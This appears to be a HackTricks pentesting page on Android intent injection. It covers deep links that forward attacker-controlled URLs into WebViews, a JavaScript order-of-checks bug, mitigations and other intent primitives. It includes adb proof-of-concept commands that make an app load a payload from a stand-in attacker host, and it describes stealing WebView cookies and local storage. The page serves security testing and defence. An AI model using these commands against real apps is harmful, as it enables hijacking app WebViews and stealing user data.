HackTricksIntent Injection
Reading time: 4 minutes
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Intent injection abuses components that accept attacker-controlled Intents or data that is later converted into Intents. Two very common patterns during Android app pentests are:
- Passing crafted extras to exported Activities/Services/BroadcastReceivers that are later forwarded to privileged, non-exported components.
- Triggering exported VIEW/BROWSABLE deep links that forward attacker-controlled URLs into internal WebViews or other sensitive sinks.
Deep links → WebView sink (URL parameter injection)
If an app exposes a custom scheme deep link such as:
myscheme://com.example.app/web?url=<attacker_url>
and the receiving Activity forwards the url query parameter into a WebView, you can force the app to render arbitrary remote content in its own WebView context.
PoC via adb:
# Implicit VIEW intent
adb shell am start -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
# Or explicitly target an Activity
adb shell am start -n com.example/.MainActivity -a android.intent.action.VIEW \
-d "myscheme://com.example.app/web?url=https://attacker.tld/payload.html"
Impact
- HTML/JS executes inside the app’s WebView profile.
- If JavaScript is enabled (by default or due to misordered checks), you can enumerate/use any exposed
@JavascriptInterfaceobjects, steal WebView cookies/local storage, and pivot.
See also:
Order-of-checks bug enabling JavaScript
A recurring bug is enabling JavaScript (or other permissive WebView settings) before the final URL allowlist/verification finishes. If early helpers accept your deep link and the WebView is configured first, your final load happens with JavaScript already enabled even if later checks are flawed or too late.
What to look for in decompiled code:
- Multiple helpers that parse/split/rebuild the URL differently (inconsistent normalization).
- Calls to
getSettings().setJavaScriptEnabled(true)before the last host/path allowlist check. - A pipeline like: parse → partial validate → configure WebView → final verify → loadUrl.
Mitigations
- Canonicalize once and validate strictly; fail closed.
- Only enable JavaScript after all checks pass and just before loading trusted content.
- Avoid exposing bridges to untrusted origins.
Other classic Intent injection primitives
- startActivity/sendBroadcast using attacker-supplied
Intentextras that are later re-parsed (Intent.parseUri(...)) and executed. - Exported proxy components that forward Intents to non-exported sensitive components without permission checks.
References
- Android – Access to app-protected components
- Samsung S24 Exploit Chain Pwn2Own 2024 Walkthrough
- Pwn2Own Ireland 2024 – Samsung S24 attack chain (whitepaper)
- Demonstration video
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.